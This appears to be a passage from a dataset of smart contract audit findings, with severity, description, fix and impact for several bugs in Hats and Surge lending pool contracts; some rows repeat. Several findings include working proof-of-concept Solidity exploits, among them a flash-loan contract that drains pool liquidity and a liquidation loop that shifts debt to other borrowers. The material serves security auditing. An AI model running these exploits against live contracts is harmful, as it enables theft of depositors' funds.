If this number is greater than `maxSigners`, there is no way to increase `targetThreshold` sufficiently to stop the reverting.\\nThe result is that the safe is permanently bricked, and will not be able to perform any transactions.","Issue Safe can be bricked because threshold is updated with validSignerCount instead of newThreshold\\nChange the value in the function call from `validSignerCount` to `newThreshold`.\\n```\\nif (newThreshold > 0) {\\n// Remove the line below\\n bytes memory data = abi.encodeWithSignature(""changeThreshold(uint256)"", validSignerCount);\\n// Add the line below\\n bytes memory data = abi.encodeWithSignature(""changeThreshold(uint256)"", newThreshold);\\n\\n bool success = safe.execTransactionFromModule(\\n address(safe), // to\\n 0, // value\\n data, // data\\n Enum.Operation.Call // operation\\n );\\n\\n if (!success) {\\n revert FailedExecChangeThreshold();\\n }\\n}\\n```\\n","All transactions will revert until `validSignerCount` can be reduced back below `targetThreshold`, which re",```\\nif (validSignerCount <= target && validSignerCount != currentThreshold) {\\n newThreshold = validSignerCount;\\n} else if (validSignerCount > target && currentThreshold < target) {\\n newThreshold = target;\\n}\\n```\\n +Changing hat toggle address can lead to unexpected changes in status,medium,"Changing the toggle address should not change the current status unless intended to. 
However, in the event that a contract's toggle status hasn't been synced to local state, this change can accidentally toggle the hat back on when it isn't intended.\\nWhen an admin for a hat calls `changeHatToggle()`, the `toggle` address is updated to a new address they entered:\\n```\\nfunction changeHatToggle(uint256 _hatId, address _newToggle) external {\\n if (_newToggle == address(0)) revert ZeroAddress();\\n\\n _checkAdmin(_hatId);\\n Hat storage hat = _hats[_hatId];\\n\\n if (!_isMutable(hat)) {\\n revert Immutable();\\n }\\n\\n hat.toggle = _newToggle;\\n\\n emit HatToggleChanged(_hatId, _newToggle);\\n}\\n```\\n\\nToggle addresses can be either EOAs (who must call `setHatStatus()` to change the local config) or contracts (who must implement the `getHatStatus()` function and return the value).\\nThe challenge comes if a hat has a toggle address that is a contract. The contract changes its toggle value to `false` but is never checked (which would push the update to the local state). The admin thus expects that the hat is turned off.\\nThen, the toggle is changed to an EOA. One would expect that, until a change is made, the hat would remain in the same state, but in this case, the hat defaults back to its local storage state, which has not yet been updated and is therefore set to `true`.\\nEven in the event that the admin knows this and tries to immediately toggle the status back to `false`, it is possible for a malicious user to sandwich their transaction between the change to the EOA and the transaction to toggle the hat off, making use of a hat that should be off. 
This could have dramatic consequences when hats are used for purposes such as multisig signing.","The `changeHatToggle()` function needs to call `checkHatToggle()` before changing over to the new toggle address, to ensure that the latest status is synced up.","Hats may unexpectedly be toggled from `off` to `on` during toggle address transfer, reactivating hats that are intended to be turned `off`.","```\\nfunction changeHatToggle(uint256 _hatId, address _newToggle) external {\\n if (_newToggle == address(0)) revert ZeroAddress();\\n\\n _checkAdmin(_hatId);\\n Hat storage hat = _hats[_hatId];\\n\\n if (!_isMutable(hat)) {\\n revert Immutable();\\n }\\n\\n hat.toggle = _newToggle;\\n\\n emit HatToggleChanged(_hatId, _newToggle);\\n}\\n```\\n" +Changing hat toggle address can lead to unexpected changes in status,medium,"Changing the toggle address should not change the current status unless intended to. However, in the event that a contract's toggle status hasn't been synced to local state, this change can accidentally toggle the hat back on when it isn't intended.\\nWhen an admin for a hat calls `changeHatToggle()`, the `toggle` address is updated to a new address they entered:\\n```\\nfunction changeHatToggle(uint256 _hatId, address _newToggle) external {\\n if (_newToggle == address(0)) revert ZeroAddress();\\n\\n _checkAdmin(_hatId);\\n Hat storage hat = _hats[_hatId];\\n\\n if (!_isMutable(hat)) {\\n revert Immutable();\\n }\\n\\n hat.toggle = _newToggle;\\n\\n emit HatToggleChanged(_hatId, _newToggle);\\n}\\n```\\n\\nToggle addresses can be either EOAs (who must call `setHatStatus()` to change the local config) or contracts (who must implement the `getHatStatus()` function and return the value).\\nThe challenge comes if a hat has a toggle address that is a contract. The contract changes its toggle value to `false` but is never checked (which would push the update to the local state). 
The admin thus expects that the hat is turned off.\\nThen, the toggle is changed to an EOA. One would expect that, until a change is made, the hat would remain in the same state, but in this case, the hat defaults back to its local storage state, which has not yet been updated and is therefore set to `true`.\\nEven in the event that the admin knows this and tries to immediately toggle the status back to `false`, it is possible for a malicious user to sandwich their transaction between the change to the EOA and the transaction to toggle the hat off, making use of a hat that should be off. This could have dramatic consequences when hats are used for purposes such as multisig signing.","The `changeHatToggle()` function needs to call `checkHatToggle()` before changing over to the new toggle address, to ensure that the latest status is synced up.","Hats may unexpectedly be toggled from `off` to `on` during toggle address transfer, reactivating hats that are intended to be turned `off`.","```\\nfunction changeHatToggle(uint256 _hatId, address _newToggle) external {\\n if (_newToggle == address(0)) revert ZeroAddress();\\n\\n _checkAdmin(_hatId);\\n Hat storage hat = _hats[_hatId];\\n\\n if (!_isMutable(hat)) {\\n revert Immutable();\\n }\\n\\n hat.toggle = _newToggle;\\n\\n emit HatToggleChanged(_hatId, _newToggle);\\n}\\n```\\n" +Precision differences when calculating userCollateralRatioMantissa causes major issues for some token pairs,high,"When calculating userCollateralRatioMantissa in borrow and liquidate. It divides the raw debt value (in loan token precision) by the raw collateral balance (in collateral precision). This skew is fine for a majority of tokens but will cause issues with specific token pairs, including being unable to liquidate a subset of positions no matter what.\\nWhen calculating userCollateralRatioMantissa, both debt value and collateral values are left in the native precision. 
As a result of this certain token pairs will be completely broken because of this. Other pairs will only be partially broken and can enter state in which it's impossible to liquidate positions.\\nImagine a token pair like USDC and SHIB. USDC has a token precision of 6 and SHIB has 18. If the user has a collateral balance of 100,001 SHIB (100,001e18) and a loan borrow of 1 USDC (1e6) then their userCollateralRatioMantissa will actually calculate as zero:\\n```\\n1e6 * 1e18 / 100,001e18 = 0\\n```\\n\\nThere are two issues with this. First is that a majority of these tokens simply won't work. The other issue is that because userCollateralRatioMantissa returns 0 there are states in which some debt is impossible to liquidate breaking a key invariant of the protocol.\\nAny token with very high or very low precision will suffer from this.",userCollateralRatioMantissa should be calculated using debt and collateral values normalized to 18 decimal points,Some token pairs will always be/will become broken,"```\\n1e6 * 1e18 / 100,001e18 = 0\\n```\\n" +Fee share calculation is incorrect,medium,"Fees are given to the feeRecipient by minting them shares. The current share calculation is incorrect and always mints too many shares the fee recipient, giving them more fees than they should get.\\nThe current equation is incorrect and will give too many shares, which is demonstrated in the example below.\\nExample:\\n```\\n_supplied = 100\\n_totalSupply = 100\\n\\n_interest = 10\\nfee = 2\\n```\\n\\nCalculate the fee with the current equation:\\n```\\n_accuredFeeShares = fee * _totalSupply / supplied = 2 * 100 / 100 = 2\\n```\\n\\nThis yields 2 shares. Next calculate the value of the new shares:\\n```\\n2 * 110 / 102 = 2.156\\n```\\n\\nThe value of these shares yields a larger than expected fee. 
Using a revised equation gives the correct amount of fees:\\n```\\n_accuredFeeShares = (_totalSupply * fee) / (_supplied + _interest - fee) = 2 * 100 / (100 + 10 - 2) = 1.852\\n\\n1.852 * 110 / 101.852 = 2\\n```\\n\\nThis new equation yields the proper fee of 2.","Issue Fee share calculation is incorrect\\nUse the modified equation shown above:\\n```\\n uint fee = _interest * _feeMantissa / 1e18;\\n // 13. Calculate the accrued fee shares\\n- _accruedFeeShares = fee * _totalSupply / _supplied; // if supplied is 0, we will have returned at step 7\\n+ _accruedFeeShares = fee * (_totalSupply * fee) / (_supplied + _interest - fee); // if supplied is 0, we will have returned at step 7\\n // 14. Update the total supply\\n _currentTotalSupply += _accruedFeeShares;\\n```\\n","Fee recipient is given more fees than intended, which results in less interest for LPs",```\\n_supplied = 100\\n_totalSupply = 100\\n\\n_interest = 10\\nfee = 2\\n```\\n +Users can borrow all loan tokens,medium,"Utilization rate check can be bypassed depositing additional loan tokens and withdrawing them in the same transaction.\\nIn the `borrow` function it is checked that the new utilization ratio will not be higher than the surge threshold. This threshold prevents borrowers from draining all available liquidity from the pool and also trigger the surge state, which lowers the collateral ratio.\\nA user can bypass this and borrow all available loan tokens following these steps:\\nDepositing the required amount of loan tokens in order to increase the balance of the pool.\\nBorrow the remaining loan tokens from the pool.\\nWithdraw the loan tokens deposited in the first step.\\nThis can be done in one transaction and the result will be a utilization rate of 100%. 
Even if the liquidity of the pool is high, the required loan tokens to perform the strategy can be borrowed using a flash loan.\\nHelper contract:\\n```\\n// SPDX-License-Identifier: UNLICENSED\\npragma solidity 0.8.17;\\n\\nimport { FlashBorrower, Flashloan, IERC20Token } from ""./FlashLoan.sol"";\\nimport { Pool } from ""./../../src/Pool.sol"";\\n\\ncontract Borrower is FlashBorrower {\\n address public immutable owner;\\n Flashloan public immutable flashLoan;\\n Pool public immutable pool;\\n IERC20Token public loanToken;\\n\\n constructor(Flashloan _flashLoan, Pool _pool) {\\n owner = msg.sender;\\n flashLoan = _flashLoan;\\n pool = _pool;\\n loanToken = IERC20Token(address(_pool.LOAN_TOKEN()));\\n }\\n\\n function borrowAll() public returns (bool) {\\n // Get current values from pool\\n pool.withdraw(0);\\n uint loanTokenBalance = loanToken.balanceOf(address(pool));\\n loanToken.approve(address(pool), loanTokenBalance);\\n\\n // Execute flash loan\\n flashLoan.execute(FlashBorrower(address(this)), loanToken, loanTokenBalance, abi.encode(loanTokenBalance));\\n }\\n\\n function onFlashLoan(IERC20Token token, uint amount, bytes calldata data) public override {\\n // Decode data\\n (uint loanTokenBalance) = abi.decode(data, (uint));\\n\\n // Deposit tokens borrowed from flash loan, borrow all other LOAN tokens from pool and\\n // withdraw the deposited tokens\\n pool.deposit(amount);\\n pool.borrow(loanTokenBalance);\\n pool.withdraw(amount);\\n\\n // Repay the loan\\n token.transfer(address(flashLoan), amount);\\n\\n // Send loan tokens to owner\\n loanToken.transfer(owner, loanTokenBalance);\\n }\\n}\\n```\\n\\nExecution:\\n```\\n// SPDX-License-Identifier: UNLICENSED\\npragma solidity 0.8.17;\\n\\nimport ""forge-std/Test.sol"";\\nimport ""../src/Pool.sol"";\\nimport ""../src/Factory.sol"";\\nimport ""./mocks/Borrower.sol"";\\nimport ""./mocks/ERC20.sol"";\\n\\ncontract PoC is Test {\\n address alice = vm.addr(0x1);\\n address bob = vm.addr(0x2);\\n Factory 
factory;\\n Pool pool;\\n Borrower borrower;\\n Flashloan flashLoan;\\n MockERC20 collateralToken;\\n MockERC20 loanToken;\\n uint maxCollateralRatioMantissa;\\n uint surgeMantissa;\\n uint collateralRatioFallDuration;\\n uint collateralRatioRecoveryDuration;\\n uint minRateMantissa;\\n uint surgeRateMantissa;\\n uint maxRateMantissa;\\n\\n function setUp() public {\\n factory = new Factory(address(this), ""G"");\\n flashLoan = new Flashloan();\\n collateralToken = new MockERC20(1 ether, 18);\\n collateralToken.transfer(bob, 1 ether);\\n loanToken = new MockERC20(100 ether, 18);\\n loanToken.transfer(alice, 1 ether);\\n loanToken.transfer(address(flashLoan), 99 ether);\\n maxCollateralRatioMantissa = 1e18;\\n surgeMantissa = 0.8e18; // 80%\\n pool = factory.deploySurgePool(IERC20(address(collateralToken)), IERC20(address(loanToken)), maxCollateralRatioMantissa, surgeMantissa, 1e15, 1e15, 0.1e18, 0.4e18, 0.6e18);\\n }\\n\\n function testFailBorrowAll() external {\\n // Alice deposits 1 LOAN token\\n vm.startPrank(alice);\\n loanToken.approve(address(pool), 1 ether);\\n pool.deposit(1 ether);\\n vm.stopPrank();\\n\\n // Bob tries to borrow all available loan tokens\\n vm.startPrank(bob);\\n collateralToken.approve(address(pool), 1 ether);\\n pool.addCollateral(bob, 1 ether);\\n pool.borrow(1 ether);\\n vm.stopPrank();\\n }\\n\\n function testBypassUtilizationRate() external {\\n uint balanceBefore = loanToken.balanceOf(bob);\\n\\n // Alice deposits 1 LOAN token\\n vm.startPrank(alice);\\n loanToken.approve(address(pool), 1 ether);\\n pool.deposit(1 ether);\\n vm.stopPrank();\\n\\n // Bob tries to borrow all available loan tokens\\n vm.startPrank(bob);\\n collateralToken.approve(address(pool), 1 ether);\\n borrower = new Borrower(flashLoan, pool);\\n pool.addCollateral(address(borrower), 1 ether);\\n borrower.borrowAll();\\n vm.stopPrank();\\n\\n assertEq(loanToken.balanceOf(bob) - balanceBefore, 1 ether);\\n }\\n}\\n```\\n",A possible solution would be adding a 
locking period for deposits of loan tokens.\\nAnother possibility is to enforce that the utilization rate was under the surge rate also in the previous snapshot.,"The vulnerability allows to drain all the liquidity from the pool, which entails two problems:\\nThe collateral ratio starts decreasing and only stops if the utilization ratio goes back to the surge threshold.\\nThe suppliers will not be able to withdraw their tokens.\\nThe vulnerability can be executed by the same or other actors every time a loan is repaid or a new deposit is done, tracking the mempool and borrowing any new amount of loan tokens available in the pool, until the collateral ratio reaches a value of zero.\\nA clear case with economic incentives to perform this attack would be that the collateral token drops its price at a high rate and borrow all the available loan tokens from the pool, leaving all suppliers without the chance of withdrawing their share.","```\\n// SPDX-License-Identifier: UNLICENSED\\npragma solidity 0.8.17;\\n\\nimport { FlashBorrower, Flashloan, IERC20Token } from ""./FlashLoan.sol"";\\nimport { Pool } from ""./../../src/Pool.sol"";\\n\\ncontract Borrower is FlashBorrower {\\n address public immutable owner;\\n Flashloan public immutable flashLoan;\\n Pool public immutable pool;\\n IERC20Token public loanToken;\\n\\n constructor(Flashloan _flashLoan, Pool _pool) {\\n owner = msg.sender;\\n flashLoan = _flashLoan;\\n pool = _pool;\\n loanToken = IERC20Token(address(_pool.LOAN_TOKEN()));\\n }\\n\\n function borrowAll() public returns (bool) {\\n // Get current values from pool\\n pool.withdraw(0);\\n uint loanTokenBalance = loanToken.balanceOf(address(pool));\\n loanToken.approve(address(pool), loanTokenBalance);\\n\\n // Execute flash loan\\n flashLoan.execute(FlashBorrower(address(this)), loanToken, loanTokenBalance, abi.encode(loanTokenBalance));\\n }\\n\\n function onFlashLoan(IERC20Token token, uint amount, bytes calldata data) public override {\\n // Decode data\\n 
(uint loanTokenBalance) = abi.decode(data, (uint));\\n\\n // Deposit tokens borrowed from flash loan, borrow all other LOAN tokens from pool and\\n // withdraw the deposited tokens\\n pool.deposit(amount);\\n pool.borrow(loanTokenBalance);\\n pool.withdraw(amount);\\n\\n // Repay the loan\\n token.transfer(address(flashLoan), amount);\\n\\n // Send loan tokens to owner\\n loanToken.transfer(owner, loanTokenBalance);\\n }\\n}\\n```\\n" +fund loss because calculated Interest would be 0 in getCurrentState() due to division error,medium,"function `getCurrentState()` Gets the current state of pool variables based on the current time and other functions use it to update the contract state. it calculates interest accrued for debt from the last timestamp but because of the division error in some cases the calculated interest would be 0 and it would cause borrowers to pay no interest.\\nThis is part of `getCurrentState()` code that calculates interest:\\n```\\n // 2. Get the time passed since the last interest accrual\\n uint _timeDelta = block.timestamp - _lastAccrueInterestTime;\\n \\n // 3. If the time passed is 0, return the current values\\n if(_timeDelta == 0) return (_currentTotalSupply, _accruedFeeShares, _currentCollateralRatioMantissa, _currentTotalDebt);\\n \\n // 4. Calculate the supplied value\\n uint _supplied = _totalDebt + _loanTokenBalance;\\n // 5. Calculate the utilization\\n uint _util = getUtilizationMantissa(_totalDebt, _supplied);\\n\\n // 6. Calculate the collateral ratio\\n _currentCollateralRatioMantissa = getCollateralRatioMantissa(\\n _util,\\n _lastAccrueInterestTime,\\n block.timestamp,\\n _lastCollateralRatioMantissa,\\n COLLATERAL_RATIO_FALL_DURATION,\\n COLLATERAL_RATIO_RECOVERY_DURATION,\\n MAX_COLLATERAL_RATIO_MANTISSA,\\n SURGE_MANTISSA\\n );\\n\\n // 7. If there is no debt, return the current values\\n if(_totalDebt == 0) return (_currentTotalSupply, _accruedFeeShares, _currentCollateralRatioMantissa, _currentTotalDebt);\\n\\n // 8. 
Calculate the borrow rate\\n uint _borrowRate = getBorrowRateMantissa(_util, SURGE_MANTISSA, MIN_RATE, SURGE_RATE, MAX_RATE);\\n // 9. Calculate the interest\\n uint _interest = _totalDebt * _borrowRate * _timeDelta / (365 days * 1e18); // does the optimizer optimize this? or should it be a constant?\\n // 10. Update the total debt\\n _currentTotalDebt += _interest;\\n```\\n\\ncode should support all the ERC20 tokens and those tokens may have different decimals. also different pools may have different values for MIN_RATE, SURGE_RATE, MAX_RATE. imagine this scenario:\\ndebt token is USDC and has 6 digit decimals.\\nMIN_RATE is 2% (2 * 1e16) and MAX_RATE is 10% (1e17) and in current state borrow rate is 5% (5 * 1e16)\\ntimeDelta is 2 seconds. (two seconds passed from last accrue interest time)\\ntotalDebt is 100 USDC (100 * 1e6).\\neach year has about 31M seconds (31 * 1e6).\\nnow code would calculate interest as: `_totalDebt * _borrowRate * _timeDelta / (365 days * 1e18) = 100 * 1e6 * 5 * 1e16 * 2 / (31 * 1e6 * 1e18) = 5 * 2 / 31 = 0`.\\nso code would calculate 0 interest in each interaction and borrowers would pay 0 interest. the debt decimal and interest rate may be different for pools and code should support all of them.",don't update contract state (lastAccrueInterestTime) when calculated interest is 0. add more decimal to total debt and save it with extra 1e18 decimals and transferring or receiving debt token convert the token amount to more decimal format or from it.,borrowers won't pay any interest and lenders would lose funds.,"```\\n // 2. Get the time passed since the last interest accrual\\n uint _timeDelta = block.timestamp - _lastAccrueInterestTime;\\n \\n // 3. If the time passed is 0, return the current values\\n if(_timeDelta == 0) return (_currentTotalSupply, _accruedFeeShares, _currentCollateralRatioMantissa, _currentTotalDebt);\\n \\n // 4. Calculate the supplied value\\n uint _supplied = _totalDebt + _loanTokenBalance;\\n // 5. 
Calculate the utilization\\n uint _util = getUtilizationMantissa(_totalDebt, _supplied);\\n\\n // 6. Calculate the collateral ratio\\n _currentCollateralRatioMantissa = getCollateralRatioMantissa(\\n _util,\\n _lastAccrueInterestTime,\\n block.timestamp,\\n _lastCollateralRatioMantissa,\\n COLLATERAL_RATIO_FALL_DURATION,\\n COLLATERAL_RATIO_RECOVERY_DURATION,\\n MAX_COLLATERAL_RATIO_MANTISSA,\\n SURGE_MANTISSA\\n );\\n\\n // 7. If there is no debt, return the current values\\n if(_totalDebt == 0) return (_currentTotalSupply, _accruedFeeShares, _currentCollateralRatioMantissa, _currentTotalDebt);\\n\\n // 8. Calculate the borrow rate\\n uint _borrowRate = getBorrowRateMantissa(_util, SURGE_MANTISSA, MIN_RATE, SURGE_RATE, MAX_RATE);\\n // 9. Calculate the interest\\n uint _interest = _totalDebt * _borrowRate * _timeDelta / (365 days * 1e18); // does the optimizer optimize this? or should it be a constant?\\n // 10. Update the total debt\\n _currentTotalDebt += _interest;\\n```\\n" +"A liquidator can gain not only collateral, but also can reduce his own debt!",medium,"A liquidator can gain not only collateral, but also can reduce his own debt. This is achieved by taking advantage of the following vulnerability of the liquidate(): it has a rounding down precision error and when one calls liquidate(Bob, 1), it is possible that the total debt is reduced by 1, but the debt share is 0, and thus Bob's debt shares will not be reduced. 
In this way, the liquidator can shift part of debt to the remaining borrowers while getting the collateral of the liquidation.\\nIn summary, the liquidator will be able to liquidate a debtor, grab proportionately the collateral, and in addition, reduce his own debt by shifting some of his debt to the other borrowers.\\nBelow, I explain the vulnerability and then show the code POC to demonstrate how a liquidator can gain collateral as well as reduce his own debt!\\nThe `liquidate()` function calls `tokenToShares()` at L587 to calculate the number of debt shares for the input `amount`. Note it uses a rounding-down.\\nDue to rounding down, it is possible that while `amount !=0`, the returned number of debt shares could be zero!\\nIn the following code POC, we show that Bob (the test account) and Alice (address(1)) both borrow 1000 loan tokens, and after one year, each of them owes 1200 loan tokens. Bob liquidates Alice's debt with 200 loan tokens. Bob gets the 200 collateral tokens (proportionately). 
In addition, Bob reduces his own debt from 1200 to 1100!\\nTo run this test, one needs to change `pool.getDebtOf()` as a public function.\\n```\\nfunction testLiquidateSteal() external {\\n uint loanTokenAmount = 12000;\\n uint borrowAmount = 1000;\\n uint collateralAmountA = 10000;\\n uint collateralAmountB = 1400;\\n MockERC20 collateralToken = new MockERC20(collateralAmountA+collateralAmountB, 18);\\n MockERC20 loanToken = new MockERC20(loanTokenAmount, 18);\\n Pool pool = factory.deploySurgePool(IERC20(address(collateralToken)), IERC20(address(loanToken)), 0.8e18, 0.5e18, 1e15, 1e15, 0.1e18, 0.4e18, 0.6e18);\\n loanToken.approve(address(pool), loanTokenAmount);\\n pool.deposit(loanTokenAmount);\\n\\n // Alice borrows 1000 \\n collateralToken.transfer(address(1), collateralAmountB);\\n vm.prank(address(1));\\n collateralToken.approve(address(pool), collateralAmountB);\\n vm.prank(address(1));\\n pool.addCollateral(address(1), collateralAmountB);\\n vm.prank(address(1));\\n pool.borrow(borrowAmount);\\n\\n // Bob borrows 1000 too \\n collateralToken.approve(address(pool), collateralAmountA);\\n pool.addCollateral(address(this), collateralAmountA);\\n pool.borrow(borrowAmount);\\n\\n // Bob's debt becomes 1200\\n vm.warp(block.timestamp + 365 days);\\n pool.withdraw(0);\\n uint mydebt = pool.getDebtOf(pool.debtSharesBalanceOf(address(this)), pool.debtSharesSupply(), pool.lastTotalDebt());\\n assertEq(mydebt, 1200); \\n\\n // Alice's debt becomes 1200\\n uint address1Debt = pool.getDebtOf(pool.debtSharesBalanceOf(address(1)), pool.debtSharesSupply(), pool.lastTotalDebt());\\n assertEq(address1Debt, 1200); \\n assertEq(pool.lastTotalDebt(), 2399); \\n\\n uint myCollateralBeforeLiquidate = collateralToken.balanceOf(address(this));\\n\\n // liquidate 200 for Alice\\n loanToken.approve(address(pool), 200);\\n for(int i; i<200; i++)\\n pool.liquidate(address(1), 1);\\n\\n // Alice's debt shares are NOT reduced, now Bob's debt is reduced to 1100\\n uint debtShares = 
pool.debtSharesBalanceOf(address(1));\\n assertEq(debtShares, 1000);\\n assertEq(pool.lastTotalDebt(), 2199);\\n address1Debt = pool.getDebtOf(pool.debtSharesBalanceOf(address(1)), pool.debtSharesSupply(), pool.lastTotalDebt());\\n assertEq(address1Debt, 1100); \\n mydebt = pool.getDebtOf(pool.debtSharesBalanceOf(address(this)), pool.debtSharesSupply(), pool.lastTotalDebt());\\n assertEq(mydebt, 1100); \\n\\n // Bob gains the collateral as well proportionately \\n uint myCollateralAfterLiquidate = collateralToken.balanceOf(address(this));\\n assertEq(myCollateralAfterLiquidate-myCollateralBeforeLiquidate, 200);\\n }\\n```\\n","We need to double check this edge case and now allowing the liquidate() to proceed when the # of debt shares is Zero.\\n```\\n function liquidate(address borrower, uint amount) external {\\n uint _loanTokenBalance = LOAN_TOKEN.balanceOf(address(this));\\n (address _feeRecipient, uint _feeMantissa) = FACTORY.getFee();\\n ( \\n uint _currentTotalSupply,\\n uint _accruedFeeShares,\\n uint _currentCollateralRatioMantissa,\\n uint _currentTotalDebt\\n ) = getCurrentState(\\n _loanTokenBalance,\\n _feeMantissa,\\n lastCollateralRatioMantissa,\\n totalSupply,\\n lastAccrueInterestTime,\\n lastTotalDebt\\n );\\n\\n uint collateralBalance = collateralBalanceOf[borrower];\\n uint _debtSharesSupply = debtSharesSupply;\\n uint userDebt = getDebtOf(debtSharesBalanceOf[borrower], _debtSharesSupply, _currentTotalDebt);\\n uint userCollateralRatioMantissa = userDebt * 1e18 / collateralBalance;\\n require(userCollateralRatioMantissa > _currentCollateralRatioMantissa, ""Pool: borrower not liquidatable"");\\n\\n address _borrower = borrower; // avoid stack too deep\\n uint _amount = amount; // avoid stack too deep\\n uint _shares;\\n uint collateralReward;\\n if(_amount == type(uint).max || _amount == userDebt) {\\n collateralReward = collateralBalance;\\n _shares = debtSharesBalanceOf[_borrower];\\n _amount = userDebt;\\n } else {\\n uint 
userInvertedCollateralRatioMantissa = collateralBalance * 1e18 / userDebt;\\n collateralReward = _amount * userInvertedCollateralRatioMantissa / 1e18; // rounds down\\n _shares = tokenToShares(_amount, _currentTotalDebt, _debtSharesSupply, false);\\n }\\n \\n// Add the line below\\n if(_shares == 0) revert ZeroShareLiquidateNotAllowed();\\n\\n _currentTotalDebt -= _amount;\\n\\n // commit current state\\n debtSharesBalanceOf[_borrower] -= _shares;\\n debtSharesSupply = _debtSharesSupply - _shares;\\n collateralBalanceOf[_borrower] = collateralBalance - collateralReward;\\n totalSupply = _currentTotalSupply;\\n lastTotalDebt = _currentTotalDebt;\\n lastAccrueInterestTime = block.timestamp;\\n lastCollateralRatioMantissa = _currentCollateralRatioMantissa;\\n emit Liquidate(_borrower, _amount, collateralReward);\\n if(_accruedFeeShares > 0) {\\n address __feeRecipient = _feeRecipient; // avoid stack too deep\\n balanceOf[__feeRecipient] // Add the line below\\n= _accruedFeeShares;\\n emit Transfer(address(0), __feeRecipient, _accruedFeeShares);\\n }\\n\\n // interactions\\n safeTransferFrom(LOAN_TOKEN, msg.sender, address(this), _amount);\\n safeTransfer(COLLATERAL_TOKEN, msg.sender, collateralReward);\\n }\\n```\\n","A liquidator can gain not only collateral, but also can reduce his own debt. 
Thus, he effectively steals funding from the pool by off-shifting his debt to the remaining borrowers.","```\\nfunction testLiquidateSteal() external {\\n uint loanTokenAmount = 12000;\\n uint borrowAmount = 1000;\\n uint collateralAmountA = 10000;\\n uint collateralAmountB = 1400;\\n MockERC20 collateralToken = new MockERC20(collateralAmountA+collateralAmountB, 18);\\n MockERC20 loanToken = new MockERC20(loanTokenAmount, 18);\\n Pool pool = factory.deploySurgePool(IERC20(address(collateralToken)), IERC20(address(loanToken)), 0.8e18, 0.5e18, 1e15, 1e15, 0.1e18, 0.4e18, 0.6e18);\\n loanToken.approve(address(pool), loanTokenAmount);\\n pool.deposit(loanTokenAmount);\\n\\n // Alice borrows 1000 \\n collateralToken.transfer(address(1), collateralAmountB);\\n vm.prank(address(1));\\n collateralToken.approve(address(pool), collateralAmountB);\\n vm.prank(address(1));\\n pool.addCollateral(address(1), collateralAmountB);\\n vm.prank(address(1));\\n pool.borrow(borrowAmount);\\n\\n // Bob borrows 1000 too \\n collateralToken.approve(address(pool), collateralAmountA);\\n pool.addCollateral(address(this), collateralAmountA);\\n pool.borrow(borrowAmount);\\n\\n // Bob's debt becomes 1200\\n vm.warp(block.timestamp + 365 days);\\n pool.withdraw(0);\\n uint mydebt = pool.getDebtOf(pool.debtSharesBalanceOf(address(this)), pool.debtSharesSupply(), pool.lastTotalDebt());\\n assertEq(mydebt, 1200); \\n\\n // Alice's debt becomes 1200\\n uint address1Debt = pool.getDebtOf(pool.debtSharesBalanceOf(address(1)), pool.debtSharesSupply(), pool.lastTotalDebt());\\n assertEq(address1Debt, 1200); \\n assertEq(pool.lastTotalDebt(), 2399); \\n\\n uint myCollateralBeforeLiquidate = collateralToken.balanceOf(address(this));\\n\\n // liquidate 200 for Alice\\n loanToken.approve(address(pool), 200);\\n for(int i; i<200; i++)\\n pool.liquidate(address(1), 1);\\n\\n // Alice's debt shares are NOT reduced, now Bob's debt is reduced to 1100\\n uint debtShares = 
pool.debtSharesBalanceOf(address(1));\\n assertEq(debtShares, 1000);\\n assertEq(pool.lastTotalDebt(), 2199);\\n address1Debt = pool.getDebtOf(pool.debtSharesBalanceOf(address(1)), pool.debtSharesSupply(), pool.lastTotalDebt());\\n assertEq(address1Debt, 1100); \\n mydebt = pool.getDebtOf(pool.debtSharesBalanceOf(address(this)), pool.debtSharesSupply(), pool.lastTotalDebt());\\n assertEq(mydebt, 1100); \\n\\n // Bob gains the collateral as well proportionately \\n uint myCollateralAfterLiquidate = collateralToken.balanceOf(address(this));\\n assertEq(myCollateralAfterLiquidate-myCollateralBeforeLiquidate, 200);\\n }\\n```\\n" +Precision differences when calculating userCollateralRatioMantissa causes major issues for some token pairs,high,"When calculating userCollateralRatioMantissa in borrow and liquidate. It divides the raw debt value (in loan token precision) by the raw collateral balance (in collateral precision). This skew is fine for a majority of tokens but will cause issues with specific token pairs, including being unable to liquidate a subset of positions no matter what.\\nWhen calculating userCollateralRatioMantissa, both debt value and collateral values are left in the native precision. As a result of this certain token pairs will be completely broken because of this. Other pairs will only be partially broken and can enter state in which it's impossible to liquidate positions.\\nImagine a token pair like USDC and SHIB. USDC has a token precision of 6 and SHIB has 18. If the user has a collateral balance of 100,001 SHIB (100,001e18) and a loan borrow of 1 USDC (1e6) then their userCollateralRatioMantissa will actually calculate as zero:\\n```\\n1e6 * 1e18 / 100,001e18 = 0\\n```\\n\\nThere are two issues with this. First is that a majority of these tokens simply won't work. 
The other issue is that because userCollateralRatioMantissa returns 0 there are states in which some debt is impossible to liquidate breaking a key invariant of the protocol.\\nAny token with very high or very low precision will suffer from this.",userCollateralRatioMantissa should be calculated using debt and collateral values normalized to 18 decimal points,Some token pairs will always be/will become broken,"```\\n1e6 * 1e18 / 100,001e18 = 0\\n```\\n" +"A liquidator can gain not only collateral, but also can reduce his own debt!",medium,"A liquidator can gain not only collateral, but also can reduce his own debt. This is achieved by taking advantage of the following vulnerability of the liquidate(): it has a rounding down precision error and when one calls liquidate(Bob, 1), it is possible that the total debt is reduced by 1, but the debt share is 0, and thus Bob's debt shares will not be reduced. In this way, the liquidator can shift part of debt to the remaining borrowers while getting the collateral of the liquidation.\\nIn summary, the liquidator will be able to liquidate a debtor, grab proportionately the collateral, and in addition, reduce his own debt by shifting some of his debt to the other borrowers.\\nBelow, I explain the vulnerability and then show the code POC to demonstrate how a liquidator can gain collateral as well as reduce his own debt!\\nThe `liquidate()` function calls `tokenToShares()` at L587 to calculate the number of debt shares for the input `amount`. Note it uses a rounding-down.\\nDue to rounding down, it is possible that while `amount !=0`, the returned number of debt shares could be zero!\\nIn the following code POC, we show that Bob (the test account) and Alice (address(1)) both borrow 1000 loan tokens, and after one year, each of them owes 1200 loan tokens. Bob liquidates Alice's debt with 200 loan tokens. Bob gets the 200 collateral tokens (proportionately). 
